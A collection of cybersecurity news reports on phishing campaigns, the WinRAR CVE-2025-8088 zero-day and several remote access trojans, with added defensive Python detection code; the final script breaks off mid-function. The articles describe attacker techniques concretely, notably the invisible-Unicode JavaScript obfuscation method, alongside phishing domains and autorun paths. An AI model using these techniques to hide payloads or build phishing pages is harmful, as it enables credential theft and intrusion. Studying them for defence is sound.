India Most Targeted by Malware as AI Drives Surge in Ransomware and Phishing Attacks

India has become the world’s most-targeted nation for malware, according to the latest report by cybersecurity firm Acronis, which highlights how artificial intelligence is fueling a sharp increase in ransomware and phishing activity. The findings come from the company’s biannual threat landscape analysis, compiled by the Acronis Threat Research Unit (TRU) and its global network of sensors tracking over one million Windows endpoints between January and June 2025. 

The report indicates that India accounted for 12.4 percent of all monitored attacks, placing it ahead of every other nation. Analysts attribute this trend to the rising sophistication of AI-powered cyberattacks, particularly phishing campaigns and impersonation attempts that are increasingly difficult to detect. With Windows systems still dominating business environments compared to macOS or Linux, the operating system remained the primary target for threat actors. 

Ransomware continues to be the most damaging threat to medium and large businesses worldwide, with newer criminal groups adopting AI to automate attacks and enhance efficiency. Phishing was found to be a leading driver of compromise, making up 25 percent of all detected threats and over 52 percent of those aimed at managed service providers, marking a 22 percent increase compared to the first half of 2024. 

Commenting on the findings, Rajesh Chhabra, General Manager for India and South Asia at Acronis, noted that India’s rapidly expanding digital economy has widened its attack surface significantly. He emphasized that as attackers leverage AI to scale operations, Indian enterprises—especially those in manufacturing and infrastructure—must prioritize AI-ready cybersecurity frameworks. He further explained that organizations need to move away from reactive security approaches and embrace behavior-driven models that can anticipate and adapt to evolving threats. 

The report also points to collaboration platforms as a growing entry point for attackers. Phishing attempts on services like Microsoft Teams and Slack spiked dramatically, rising from nine percent to 30.5 percent in the first half of 2025. Similarly, advanced email-based threats such as spoofed messages and payload-less attacks increased from nine percent to 24.5 percent, underscoring the urgent requirement for adaptive defenses. 

Acronis recommends that businesses adopt a multi-layered protection strategy to counter these risks. This includes deploying behavior-based threat detection systems, conducting regular audits of third-party applications, enhancing cloud and email security solutions, and reinforcing employee awareness through continuous training on social engineering and phishing tactics. 

The findings make clear that India’s digital growth is running parallel to escalating cyber risks. As artificial intelligence accelerates the capabilities of malicious actors, enterprises will need to proactively invest in advanced defenses to safeguard critical systems and sensitive data.

New Gmail Phishing Attack Exploits Login Flow to Steal Credentials

Even in a society where convenience and connectivity are the norm, cyber threats continue to evolve at an alarming rate. Phishing attacks and online scams targeting U.S. consumers are reportedly on the rise, with malicious actors increasingly going after login credentials in order to steal personal and financial information. The Federal Bureau of Investigation (FBI) reports that online scams accounted for $16.6 billion in losses last year, a 33 per cent jump over the year prior.

Surveys underline the trend: more than 60 per cent of Americans feel scam attempts are increasing, and nearly one in three report having been affected by a data breach. Taken together, these figures make clear that fortifying digital defences against an ever-expanding threat landscape is of utmost importance. 

Phishing itself is not new; however, it has evolved dramatically over the past few decades. Older scams were easy to spot thanks to clumsy emails full of spelling errors and awkward greetings like "Dear User." Today's attacks are far more sophisticated. In this latest Gmail phishing campaign, Google's legitimate login process is mimicked with alarming accuracy, deceiving even tech-savvy users. 

Security researchers have documented thousands of compromised Gmail accounts, with stolen credentials opening the door to further intrusions into banking, retail, and social networking accounts. A breach of this kind is akin to an intruder entering one's digital home with the rightful owner's key. 

Such a breach causes lasting financial and personal damage that extends well beyond inconvenience. Investigations show that the campaign relies on deception and the abuse of trusted infrastructure. Fraudulent "New Voice Notification" emails, sent with spoofed sender details, tell victims that a voicemail is waiting for them. The messages are sent through a legitimate Microsoft Dynamics marketing platform, which lends them instant credibility and lets them slip past many standard security controls. 

A CAPTCHA page on horkyrown[.]com, a domain traced to Pakistan, then redirects victims to a fake login page that is an exact copy of Gmail's. Because credentials are exfiltrated in real time, the account can be taken over almost immediately. The use of artificial intelligence in phishing operations adds a further layer of complexity. 

Using advanced language models, cybercriminals now craft flawless emails, mimic writing styles, and even place convincing voice calls impersonating trusted figures. Security companies report that AI-driven phishing attempts are as effective as human-crafted ones, if not more so, with success rates rising 55 per cent between 2023 and 2025. 

Techniques such as metadata spoofing and "Open Graph Spoofing" let attackers disguise malicious links so that they are almost indistinguishable from safe ones. This new wave of phishing, increasingly personalised, multimodal, and distributed at unprecedented scale, is becoming ever harder to detect. 

The FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have already issued warnings about AI-enhanced phishing campaigns targeting Gmail accounts. In one case, Ethereum developer Nick Johnson described receiving a fraudulent "subpoena" email that passed Gmail's authentication checks and looked just like a legitimate security alert. In similar attacks, phone calls and email have been combined to harvest recovery codes, enabling full account takeover. 

Analysts also found that attackers stole session cookies, letting them skip the login step entirely. Although Google's filters now block nearly 10 million malicious emails per minute, experts warn that attackers are adapting faster, making stronger authentication and user vigilance essential. 

Technical analysis of the attack found that Russian servers (purpxqha[.]ru) were used to redirect traffic and perform cross-site requests, while the primary domain infrastructure was registered in Karachi, Pakistan. 

The malicious system defeats multiple layers of Gmail's protection: it collects not only email address and password combinations but also two-factor authentication codes, Google Authenticator tokens, backup recovery keys, and even answers to security questions, giving the attackers complete control of victims' accounts before the victims realise they have been compromised. Security experts recommend that organisations block the identified domains, strengthen monitoring, and educate users about these evolving attack vectors. The Gmail campaign reflects a broader reality: cybersecurity is no longer a passive discipline but a continuous one that must adapt at the speed of innovation. 

For individuals, cultivating digital scepticism is a priority: question every unexpected email, voicemail, or login request, and reinforce accounts with two-factor authentication or hardware security keys. Note that a code typed into a look-alike page is relayed by the attacker just like a password, which is why a hardware security key, whose response is bound to the genuine site's origin, is the stronger of the two choices. A company's responsibilities extend further: investing in employee awareness training, running mock phishing exercises, and deploying adaptive tools capable of detecting subtle changes in behaviour. 

Collaboration between industry leaders, governments, and security researchers will be crucial to dismantling the criminal infrastructure that exploits global trust. In an environment where deception grows more sophisticated every day, vigilance is no longer merely a precaution but a form of empowerment, allowing individuals and businesses alike to protect their digital identities.

Israel and Iran Cyber War Escalates After June Conflict Despite Ceasefire

The long-running cyber conflict between Israel and Iran has intensified following the June war, according to a recent report by the Financial Times. Israeli officials disclosed that they began receiving suspicious text messages containing malicious links soon after the 12-day conflict. One official, speaking anonymously, confirmed that the attacks have not stopped, emphasizing that the cyber hostilities remain active despite a temporary ceasefire on the battlefield. 

Recent incidents highlight the scale of the digital confrontation. Iranian hackers have been linked to phishing campaigns targeting Israeli diplomats and government officials, while also attempting to exploit vulnerabilities in Microsoft software to infiltrate Israeli networks. 

In parallel, Israel and groups aligned with its interests have launched disruptive cyberattacks on Iran, underscoring how digital warfare has become a central element in the shadow war between the two nations. During the June conflict, Iran’s Ministry of Communications reported facing what it described as its most extensive cyberattack campaign to date, with more than 20,000 incidents in just 12 days. 

One attack temporarily disabled Iran’s air defense systems as Israeli Air Force jets launched strikes on Tehran on June 13. Israeli cybersecurity experts later described the air defense breach as a tactical move designed to give Israel an initial advantage, while stressing that intelligence gathering on Iranian military figures and nuclear scientists was the most significant outcome. 

On the other side, an Israeli-aligned hacking group known as Gonjeshke Darande claimed responsibility for siphoning around $90 million from the Iranian cryptocurrency exchange Nobitex, transferring the funds into a wallet that could not be accessed. Nobitex rejected accusations that it operated as a regime tool, though the same group also targeted two major Iranian banks, including state-owned Bank Sepah. 

These attacks reportedly crippled banking systems by disabling not only the primary data systems but also the backup and disaster recovery servers, according to Dotin, the software provider for the affected banks. Meanwhile, Iranian-backed hackers conducted cyber operations against 50 Israeli companies, including firms in logistics, human resources, and defense-related sectors.

Leaked resumes of thousands of Israeli citizens linked to defense work were published online. Attackers also attempted to manipulate Israelis by sending fake messages that appeared to come from the Home Front Command, advising civilians to avoid bomb shelters during missile strikes. Other attempts focused on breaching security camera systems to track the locations of incoming rockets. 

Despite these efforts, Israeli cybersecurity officials argue that the cyberattacks on their country have caused minimal disruption. Iran, however, appears to have suffered more significant setbacks. Senior Iranian officials acknowledged weaknesses in their systems, citing the country’s centralized data structures as a vulnerability exploited by Israeli forces. 

The scale of the damage prompted calls within Iran for urgent measures to strengthen its cyber defense capabilities. Experts believe the cyber war will continue to escalate, as it allows both sides to strike at one another without triggering immediate international backlash. Analysts note that while conventional attacks risk provoking strong responses from global powers, operations in cyberspace often proceed unchecked. 

For Israel and Iran, the digital battlefield has become a critical front in their decades-long struggle, one that persists even when guns fall silent.

WinRAR Flaw Exploited as Zero-Day to Spread RomCom Malware in Phishing Attacks

A recently patched security flaw in WinRAR, identified as CVE-2025-8088, was weaponized as a zero-day exploit in phishing campaigns to deliver the RomCom malware, security researchers revealed.

The vulnerability, a directory traversal bug, was addressed in WinRAR version 7.13. It enabled attackers to craft malicious archives that could extract files into arbitrary file paths defined by the attacker rather than those selected by the user.

According to the WinRAR 7.13 changelog: "When extracting a file, previous versions of WinRAR, Windows versions of RAR, UnRAR, portable UnRAR source code and UnRAR.dll can be tricked into using a path, defined in a specially crafted archive, instead of user specified path."

It further clarified that "Unix versions of RAR, UnRAR, portable UnRAR source code and UnRAR library, also as RAR for Android, are not affected."

By exploiting this flaw, attackers could place executables in Windows autorun directories, such as:
  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (user-specific)
  • %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp (system-wide)
This ensured that the malicious files would run automatically the next time the user logged on (for example after a reboot), giving attackers code execution on the victim's machine.

Since WinRAR lacks an auto-update mechanism, users are urged to manually download the latest version from win-rar.com to protect themselves against this vulnerability.

The vulnerability was uncovered by Anton Cherepanov, Peter Košinár, and Peter Strýček from ESET. Strýček confirmed to BleepingComputer that the bug was actively exploited: "ESET has observed spearphishing emails with attachments containing RAR files," he said.

These malicious archives were used to deploy RomCom backdoors. Also known as Storm-0978, Tropical Scorpius, or UNC2596, RomCom is a Russia-linked cybercrime group tied to ransomware, credential theft, and extortion operations.

The group has a track record of leveraging zero-day exploits and developing custom malware to maintain persistence, steal sensitive data, and conduct espionage operations. RomCom has also been associated with ransomware families such as Cuba and Industrial Spy.

ESET confirmed that a detailed report on the exploitation of this flaw will be released in the coming weeks.

New ResolverRAT Malware Targets Healthcare and Pharma Sectors Worldwide

A newly discovered remote access trojan (RAT), dubbed ResolverRAT, is being actively used in targeted cyberattacks against healthcare and pharmaceutical entities across various countries. Identified by cybersecurity researchers at Morphisec, the malware is delivered through phishing emails and uses in-memory execution tactics that allow it to bypass most traditional endpoint security solutions.

The attack campaign is tailored to different regions, with phishing messages crafted in native languages such as Czech, Italian, Turkish, Hindi, Portuguese, and Indonesian. These deceptive emails often reference legal or copyright-related issues to lure users into clicking malicious links. Victims unknowingly download a legitimate executable, hpreader.exe, which is manipulated through a technique called reflective DLL loading—executing the malicious code entirely in memory.

Morphisec researchers note that the attack leverages DLL side-loading: by placing a malicious DLL alongside a trusted but vulnerable application, the malware is executed when the genuine software is launched. Further, ResolverRAT exploits the .NET ‘ResourceResolve’ event to load malicious assemblies, avoiding typical flagged API calls.

“This resource resolver hijacking represents malware evolution at its finest – utilizing an overlooked .NET mechanism to operate entirely within managed memory, circumventing traditional security monitoring focused on Win32 API and file system operations,” wrote Morphisec’s Nadav Lorber in a blog.

ResolverRAT is equipped with multiple anti-analysis capabilities. It features a complex state machine that obfuscates its control flow and fingerprints system behaviors, making it difficult for sandboxes and debugging tools to detect or analyze.

To maintain persistence, the malware writes XOR-obfuscated keys into up to 20 Windows registry entries and replicates itself in directories such as Startup and LocalAppData. It connects to its command-and-control (C2) server at irregular intervals, further concealing its network activity from pattern-based detection tools.

The RAT handles commands using separate threads, which enables parallel task execution and reduces crash risks. For data exfiltration, it employs a chunked transfer method—splitting files larger than 1MB into smaller 16KB segments sent only when the socket is ready, a strategy that supports stealth and transfer recovery in poor network conditions.

ResolverRAT encrypts its payload with AES-256 in CBC mode via the .NET System.Security.Cryptography library. The keys and IVs are obfuscated and only decoded at runtime. Additionally, the payload is compressed using GZip and runs exclusively in memory to minimize detection risk.

While some of the phishing infrastructure resembles earlier Rhadamanthys and Lumma campaigns, Morphisec emphasized that the unique design of ResolverRAT's loader and payload warrants its classification as a new malware strain.

Over Half of Organizations Lack AI Cybersecurity Strategies, Mimecast Report Reveals

More than 55% of organizations have yet to implement dedicated strategies to counter AI-driven cyber threats, according to new research by Mimecast. The cybersecurity firm's latest State of Human Risk report, based on insights from 1,100 IT security professionals worldwide, highlights growing concerns over AI vulnerabilities, insider threats, and cybersecurity funding shortfalls.

The study reveals that 96% of organizations report improved risk management after adopting a formal cybersecurity strategy. However, security leaders face an increasingly complex threat landscape, with AI-powered attacks and insider risks posing significant challenges.

“Despite the complexity of challenges facing organisations—including increased insider risk, larger attack surfaces from collaboration tools, and sophisticated AI attacks—organisations are still too eager to simply throw point solutions at the problem,” said Mimecast’s human risk strategist VP, Masha Sedova. “With short-staffed IT and security teams and an unrelenting threat landscape, organisations must shift to a human-centric platform approach that connects the dots between employees and technology to keep the business secure.”

The report finds that 95% of organizations are leveraging AI for threat detection, endpoint security, and insider risk analysis. However, 81% express concerns over data leaks from generative AI (GenAI) tools. More than half lack structured strategies to combat AI-driven attacks, while 46% remain uncertain about their ability to defend against AI-powered phishing and deepfake threats.

Insider threats have surged by 43%, with 66% of IT leaders anticipating an increase in data loss from internal sources in the coming year. The report estimates that insider-driven data breaches, leaks, or theft cost an average of $13.9 million per incident. Additionally, 79% of organizations believe collaboration tools have heightened security risks, amplifying both intentional and accidental data breaches.

Despite 85% of organizations raising their cybersecurity budgets, 61% cite financial constraints as a barrier to addressing emerging threats and implementing AI-driven security solutions. The report underscores the need for increased investment in cybersecurity staffing, third-party security services, email security, and collaboration tool protection.

Although 87% of organizations conduct quarterly cybersecurity training, 33% of IT leaders remain concerned about employee mismanagement of email threats, while 27% cite security fatigue as a growing risk. 95% of organizations expect email-based cyber threats to persist in 2025, as phishing attacks continue to exploit human vulnerabilities.

Collaboration tools are expanding attack surfaces, with 44% of organizations reporting a rise in cyber threats originating from these platforms. 61% believe a cyberattack involving collaboration tools could disrupt business operations in 2025, raising concerns over data integrity and compliance.

The report highlights a shift from traditional security awareness training to proactive Human Risk Management. Notably, just 8% of employees are responsible for 80% of security incidents. Organizations are increasingly turning to AI-driven monitoring and behavioral analytics to detect and mitigate threats early. 72% of security leaders see human-centric cybersecurity solutions as essential in the next five years, signaling a shift toward advanced threat detection and risk mitigation.

Netflix Users Warned About AI-Powered Phishing Scam

Netflix subscribers are being warned about a sophisticated phishing scam circulating via email, designed to steal personal and financial information. 

The deceptive email mimics an official Netflix communication, falsely claiming that the recipient’s account has been put on hold. It urges users to click a link to resolve the issue, which redirects them to a fraudulent login page that closely resembles Netflix’s official site. 

Unsuspecting users are then prompted to enter sensitive details, including their Netflix credentials, home address, and payment information. Cybersecurity experts caution that phishing scams have become more advanced with the rise of AI-driven tactics. 

According to Jake Moore, Global Cybersecurity Advisor at ESET, artificial intelligence has enabled cybercriminals to launch phishing campaigns at an unprecedented scale, making them appear more legitimate while targeting a larger number of users. 

“Despite these advancements, many scams still rely on urgency to pressure recipients into acting quickly without verifying the sender’s authenticity,” Moore explained. 

Users are advised to remain vigilant, double-check email sources, and avoid clicking on suspicious links. Instead, they should visit Netflix directly through its official website or app to verify any account-related issues.

YouTube Alerts Creators About AI-Generated Phishing Scam Using CEO’s Video

YouTube has issued a warning about a new phishing scam where cybercriminals are using an AI-generated video of CEO Neal Mohan to deceive content creators and steal their credentials. The scammers distribute the video privately through emails, falsely claiming that YouTube is implementing changes to its monetization policy.

"We're aware that phishers have been sharing private videos to send false videos, including an AI-generated video of YouTube’s CEO Neal Mohan announcing changes in monetization," YouTube stated in a pinned post on its official community website. 

"YouTube and its employees will never attempt to contact you or share information through a private video. If a video is shared privately with you claiming to be from YouTube, the video is a phishing scam."

Ironically, the phishing emails warn recipients that YouTube will never contact users through private videos, urging them to report suspicious emails.

The fraudulent video’s description contains a malicious link directing users to a fake YouTube Partner Program (YPP) page (studio.youtube-plus[.]com). Here, creators are prompted to sign in to “confirm updated terms” to continue monetizing their content. However, this site is designed to steal login credentials. The scam also induces urgency, falsely stating that accounts will face restrictions—including an inability to upload or edit videos and receive monetization—if compliance is not confirmed within seven days. Once login details are entered, victims receive a message stating their channel is "pending" and are directed to open a document in the video description for more information, even if they input a random email and password.

These phishing emails have been circulating since late January, with YouTube confirming an investigation into the campaign beginning in mid-February. The company advises users to avoid clicking any embedded links, as they may redirect to phishing sites or install malware.

"Many phishers actively target creators by trying to find ways to impersonate YouTube by exploiting in-platform features to link to malicious content," the platform added. "Please always be aware and make sure not to open untrusted links or files!"

Several creators have already fallen victim to the scam, reporting that their channels were hijacked and used to broadcast live cryptocurrency fraud streams.

YouTube offers guidelines on identifying and reporting phishing attempts through its help center. Additionally, since August 2024, the platform has introduced a support assistant to aid users in recovering and securing compromised accounts.

Hackers Use Invisible Unicode Trick to Hide Phishing Attacks

Cybercriminals have discovered a new way to conceal malicious code inside phishing attacks by using invisible Unicode characters. This technique, identified by Juniper Threat Labs, has been actively used in attacks targeting affiliates of a U.S. political action committee (PAC). By making their scripts appear as blank space, hackers can evade detection from traditional security tools and increase the likelihood of successfully compromising victims. 

The attack, first observed in early January 2025, is more advanced than typical phishing campaigns. Hackers customized their messages using personal, non-public details about their targets, making the emails seem more legitimate. They also implemented various tricks to avoid detection, such as inserting debugger breakpoints and using timing checks to prevent cybersecurity professionals from analyzing the script. 

Additionally, they wrapped phishing links inside multiple layers of Postmark tracking links, making it harder to trace the final destination of the attack. The method itself isn’t entirely new. In October 2024, JavaScript developer Martin Kleppe introduced the idea as an experimental programming technique. However, cybercriminals quickly adapted it for phishing attacks. 

The trick works by converting each character of a JavaScript script into 8-bit binary. Instead of visible ones and zeros, the attackers write each bit as one of two invisible Hangul filler characters, U+FFA0 (halfwidth Hangul filler) and U+3164 (Hangul filler). Since these characters render as nothing on screen, the malicious code looks completely empty, making it hard to spot by eye and easy for automated scanners to treat as whitespace. 

The hidden script is stored as a property inside a JavaScript object, where it appears as blank space. A separate bootstrap script then retrieves the hidden payload through a JavaScript Proxy get() trap: when the property is accessed, the proxy converts the invisible Unicode characters back into binary, reconstructs the original JavaScript, and lets the attack execute. To make detection even harder, the attackers layer further evasion on top. Base64 encoding disguises the script a second time, and anti-debugging measures shut the script down and redirect the user to a harmless website if it detects that it is being analysed, for instance when someone opens it in a debugger. This keeps researchers from easily studying the malware. 

This technique is particularly dangerous because it lets attackers blend malicious code into legitimate scripts without raising suspicion. The invisible payload can be injected into otherwise safe websites, and because it appears as empty space, many security tools may fail to detect it. 

Juniper Threat Labs linked two of the domains used in this campaign to the Tycoon 2FA phishing kit, a tool previously associated with large-scale phishing operations. This connection suggests that the technique could soon be adopted by other cybercriminals. As attackers continue to develop new evasion strategies, cybersecurity teams will need to create better detection methods to counter these hidden threats before they cause widespread damage.

Hackers Steal Login Details via Fake Microsoft ADFS login pages

A help desk phishing campaign targeted companies' Microsoft Active Directory Federation Services (ADFS) sign-in pages with look-alike login pages, stealing credentials and bypassing multi-factor authentication (MFA).

The campaign hit healthcare, government, and education organizations, with around 150 victims, according to Abnormal Security. The attackers aim to gain access to corporate mail accounts, either to send phishing emails to more victims inside the company or to launch financially motivated campaigns such as business email compromise (BEC), in which money is sent directly to attacker-controlled accounts. 

Fake Microsoft ADFS login pages 

Microsoft ADFS is an authentication mechanism that lets users log in once and access multiple applications and services without re-entering their credentials. 

ADFS is generally used by large businesses, as it offers single sign-on (SSO) for internal and cloud-based apps. 

The threat actors send emails spoofing the victims' IT team, asking them to sign in to update their security configuration or accept the latest policies. 

How victims are trapped

When victims click the embedded button, they are taken to a phishing site that is identical to their company's genuine ADFS sign-in page. The fake page asks for the username, password and MFA code, or tricks the victim into approving a push notification.

What do the experts say

The security report by Abnormal suggests, "The phishing templates also include forms designed to capture the specific second factor required to authenticate the targets account, based on the organization's configured MFA settings.” Additionally, "Abnormal observed templates targeting multiple commonly used MFA mechanisms, including Microsoft Authenticator, Duo Security, and SMS verification."

After the victim submits all the information, they are redirected to the real sign-in page to avoid suspicion and make the process look legitimate. 

Meanwhile, the threat actors immediately use the stolen credentials to sign into the victim's account, steal sensitive data, create new email filter rules, and attempt lateral phishing. 

According to Abnormal, the threat actors used Private Internet Access VPN to hide their location and obtain an IP address geographically closer to the targeted organization.  
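One way to catch the post-compromise step the post describes (a sign-in from an unfamiliar address, followed within minutes by a new inbox rule that hides mail from the real owner) is to correlate mailbox audit events. The following is an added example, not code from Abnormal Security or Microsoft; the event records, field names, IP baseline and addresses are constructed assumptions rather than the real audit log schema:

```python
"""Correlate a sign-in from an unseen IP with a subsequent inbox-rule creation.

Added example.  The event format below is a constructed simplification, not
Microsoft's real unified audit log schema; IPs are documentation ranges.
"""
from datetime import datetime, timedelta

# Constructed baseline: addresses each mailbox owner has signed in from before.
KNOWN_IPS = {
    "j.doe@example.com": {"203.0.113.10"},
    "a.smith@example.com": {"203.0.113.10"},
}

# Constructed audit events (simplified field names, assumption).
EVENTS = [
    {"ts": "2025-02-03T08:01:00", "user": "j.doe@example.com", "op": "UserLoggedIn", "ip": "203.0.113.10"},
    {"ts": "2025-02-03T09:12:00", "user": "j.doe@example.com", "op": "UserLoggedIn", "ip": "198.51.100.77"},
    {"ts": "2025-02-03T09:14:00", "user": "j.doe@example.com", "op": "New-InboxRule", "ip": "198.51.100.77",
     "rule": {"SubjectContainsWords": ["password", "invoice"], "DeleteMessage": True}},
    {"ts": "2025-02-03T09:20:00", "user": "a.smith@example.com", "op": "New-InboxRule", "ip": "203.0.113.10",
     "rule": {"FromAddressContainsWords": ["newsletter"], "MoveToFolder": "Reading"}},
]

# Rule actions that hide or divert mail, which is what an intruder uses to keep
# replies and security alerts away from the mailbox owner.
HIDING_ACTIONS = {"DeleteMessage", "MoveToFolder", "ForwardTo",
                  "ForwardAsAttachmentTo", "RedirectTo", "MarkAsRead"}


def find_suspicious_rule_creations(events, known_ips, window=timedelta(hours=1)):
    """Return alerts for inbox rules created within `window` of a sign-in from an unseen IP."""
    last_new_ip_signin = {}   # user -> (timestamp, ip) of the latest sign-in from an unknown address
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, user = datetime.fromisoformat(ev["ts"]), ev["user"]
        if ev["op"] == "UserLoggedIn":
            if ev["ip"] not in known_ips.get(user, set()):
                last_new_ip_signin[user] = (ts, ev["ip"])
        elif ev["op"] == "New-InboxRule":
            prior = last_new_ip_signin.get(user)
            if prior is None or ts - prior[0] > window:
                continue                      # no recent unfamiliar sign-in: ordinary rule management
            hiding = sorted(set(ev.get("rule", {})) & HIDING_ACTIONS)
            alerts.append({
                "user": user,
                "signin_ts": prior[0].isoformat(),
                "signin_ip": prior[1],
                "rule_ts": ev["ts"],
                "hiding_actions": hiding,
                "severity": "high" if hiding else "medium",
            })
    return alerts


if __name__ == "__main__":
    for alert in find_suspicious_rule_creations(EVENTS, KNOWN_IPS):
        print(alert)
```

The baseline of known addresses is deliberately static here; in practice it would be built from weeks of prior sign-ins, and a VPN exit address that is "close" to the organization would still be unfamiliar for that user, which is why the correlation works even when the attacker has picked a nearby exit.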

This New Malware Exploits VPN Apps to Hijack Devices

A newly discovered malware, named PLAYFULGHOST, is causing concern among cybersecurity experts due to its versatile capabilities for data theft and system compromise. According to researchers, this malware employs techniques such as screen and audio capture, keylogging, remote shell access, and file transfer, enabling threat actors to launch further attacks.

PLAYFULGHOST is primarily delivered through phishing emails or SEO poisoning techniques, which distribute trojanized VPN applications. Once executed, it establishes persistence using four methods: the run registry key, scheduled tasks, Windows startup folder, and Windows services. This persistence allows the malware to collect a vast array of data, including keystrokes, screenshots, system metadata, clipboard content, and QQ account details, as well as information on installed security products.

The malware also exhibits advanced functionalities such as deploying additional payloads, blocking mouse or keyboard inputs, clearing event logs, deleting cache and browser profiles, and wiping messaging app data. Notably, it can use Mimikatz, a tool for extracting passwords, and a rootkit to conceal registry entries, files, and processes. PLAYFULGHOST further utilizes Terminator, an open-source utility, to disable security processes via a BYOVD (Bring Your Own Vulnerable Driver) attack.

The initial infection often begins with phishing emails containing lures such as warnings about code-of-conduct violations. Alternatively, it leverages SEO poisoning to distribute malicious versions of legitimate VPN apps like LetsVPN. For instance, one victim unknowingly launched a malicious executable disguised as an image file, which subsequently downloaded and executed PLAYFULGHOST. Google’s Managed Defense team notes that this backdoor shares features with the Gh0st RAT, whose source code was leaked in 2008.

PLAYFULGHOST infections employ DLL search order hijacking and sideloading to launch malicious DLLs, decrypting and loading the malware directly into memory. It also uses combined Windows shortcuts and rogue DLL construction for stealthy execution.
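The delivery step described above relies on a file whose name says "image" but whose content is a program or a Windows shortcut. A mail gateway or endpoint triage script can catch that mismatch by comparing the declared extension with the file's magic bytes. The following is an added example, not code from Google's Managed Defense team; the sample file names and byte strings are constructed:

```python
"""Flag attachments whose declared type does not match their real content.

Added example; sample inputs are constructed.  Magic values: PE files start
with 'MZ'; Windows shell links start with a 0x4C header size followed by the
LNK CLSID 00021401-0000-0000-C000-000000000046 in little-endian layout.
"""

PE_MAGIC = b"MZ"
LNK_MAGIC = bytes.fromhex("4C000000" "01140200" "00000000" "C000000000000046")
IMAGE_MAGICS = {
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".lnk", ".dll"}


def classify_attachment(name, data):
    """Return a list of human-readable findings; an empty list means nothing looked wrong."""
    findings = []
    parts = name.lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""

    if "\u202e" in name:   # right-to-left override makes 'gpj.exe' display as 'exe.jpg'
        findings.append("right-to-left override character in file name")
    if ext in EXECUTABLE_EXTS:
        findings.append(f"executable type {ext} delivered as attachment")
        if len(parts) > 2 and "." + parts[-2] in IMAGE_MAGICS:
            findings.append(f"double extension: image name hides {ext}")
    if data.startswith(PE_MAGIC) and ext not in EXECUTABLE_EXTS:
        findings.append(f"PE executable content behind '{ext or 'no'}' extension")
    if data.startswith(LNK_MAGIC) and ext != ".lnk":
        findings.append("Windows shortcut (LNK) content behind non-LNK extension")
    if ext in IMAGE_MAGICS and not data.startswith(IMAGE_MAGICS[ext]):
        findings.append(f"content does not match declared image type {ext}")
    return findings


if __name__ == "__main__":
    samples = {                                   # constructed inputs
        "invoice.png": b"\x89PNG\r\n\x1a\n" + bytes(16),
        "photo.jpg": b"MZ\x90\x00" + bytes(60),
        "photo.jpg.exe": b"MZ" + bytes(60),
        "readme.txt": LNK_MAGIC + bytes(40),
    }
    for filename, content in samples.items():
        print(filename, "->", classify_attachment(filename, content) or "clean")
```

Checking content rather than the name is what defeats the "image" disguise; the shortcut check matters because the post notes PLAYFULGHOST also chains Windows shortcuts with a rogue DLL to get its loader running.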

How to Protect Yourself

To avoid falling victim to PLAYFULGHOST, adopt the following security practices:
  • Be cautious with phishing emails: Verify the sender and context before clicking links or downloading attachments. If unsure, confirm directly with the sender or relevant departments.
  • Download only from trusted sources: Always access applications from official websites rather than links in emails or messages.
  • Avoid urgency traps: If contacted about urgent matters like account issues, manually visit the company’s website by typing its URL into your browser.
  • Strengthen account security: Use unique passwords, a password manager, two-factor authentication, and robust antivirus software across devices.
For additional protection, consider antivirus programs with integrated VPNs or hardened browsers for enhanced security. Stay informed about phishing techniques and remain vigilant online. As Google’s Managed Defense team warns, “PLAYFULGHOST’s sophistication highlights the need for constant vigilance against evolving cyber threats.”

Hackers Use Russian Domains for Phishing Attacks

The latest research has found a sharp rise in suspicious email activity and a change in attack tactics. If you communicate via email regularly, keep a lookout for malicious or unusual activity; it might be a scam. This post covers the latest tactics threat actors are using.

Malicious email escapes SEGs

At least one malicious email bypasses Secure Email Gateways (SEGs) such as Proofpoint and Microsoft every 45 seconds, a significant rise from last year's rate of one every 57 seconds, according to Cofense Intelligence's third-quarter report.

A sudden increase in the use of remote access Trojans (RATs) allows hackers to gain illegal access to the target’s system, which leads to further abuse, theft, and data exploitation.

Increase in Remote Access Trojan (RAT) use

Remcos RAT, a frequently used tool among hackers, is a key factor contributing to the surge in RAT attacks. It allows the attacker to remotely manipulate infected systems, exfiltrate data, deploy other malware, and obtain persistent access to vulnerable networks.

According to the data, the use of open redirects in phishing attempts has increased by 627%. These attacks use legitimate website functionality to redirect users to malicious URLs, frequently disguised as well-known and reputable domains.

Using TikTok and Google AMP

TikTok and Google AMP are frequently used to carry out these attacks, leveraging their worldwide reach and widespread use by unknowing users.

The use of malicious Office documents, particularly those in .docx format, increased by roughly 600%. These documents frequently include phishing links or QR codes that lead people to malicious websites.

Microsoft Office documents are an important attack vector due to their extensive use in commercial contexts, making them perfect for targeting enterprises via spear-phishing operations.

Furthermore, there has been a substantial shift in data exfiltration strategies, with a rise in the use of .ru and .su top-level domains (TLDs). Domains with the .ru (Russia) and .su (Soviet Union) extensions saw usage spikes of more than fourfold and twelvefold, respectively, indicating that cybercriminals are turning to less common, geographically associated domains to evade detection and make it harder for victims and security teams to track data theft.
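Two of the findings above lend themselves to a simple URL triage check: an open redirect hides the real destination behind a reputable host, and the final destination increasingly sits under .ru or .su. The following is an added example, not Cofense's code; it handles the query-parameter form of open redirect and the Google AMP cache path form (`/amp/s/<host>/...`), and the sample URLs and hostnames are constructed:

```python
"""Triage URLs for open-redirect indirection and suspicious destination TLDs.

Added example; sample URLs are constructed.  A redirect is inferred when a
query value (or an AMP cache path segment) names a different host than the
URL's own host.
"""
from urllib.parse import parse_qsl, unquote, urlparse

SUSPICIOUS_TLDS = {"ru", "su"}     # the two TLDs the report singles out


def _absolute_host(value):
    """Host name if `value` is an absolute http(s) or scheme-relative URL, else None."""
    candidate = unquote(value).strip()          # parse_qsl already decoded once; handle double-encoding
    if candidate.startswith("//"):
        candidate = "https:" + candidate
    parsed = urlparse(candidate)
    if parsed.scheme in ("http", "https") and parsed.hostname:
        return parsed.hostname.lower()
    return None


def analyze_url(url):
    parsed = urlparse(url)
    outer_host = (parsed.hostname or "").lower()
    redirect_host, via = None, None

    if parsed.path.startswith("/amp/s/"):
        # AMP cache style path: the target site is the segment after /amp/s/
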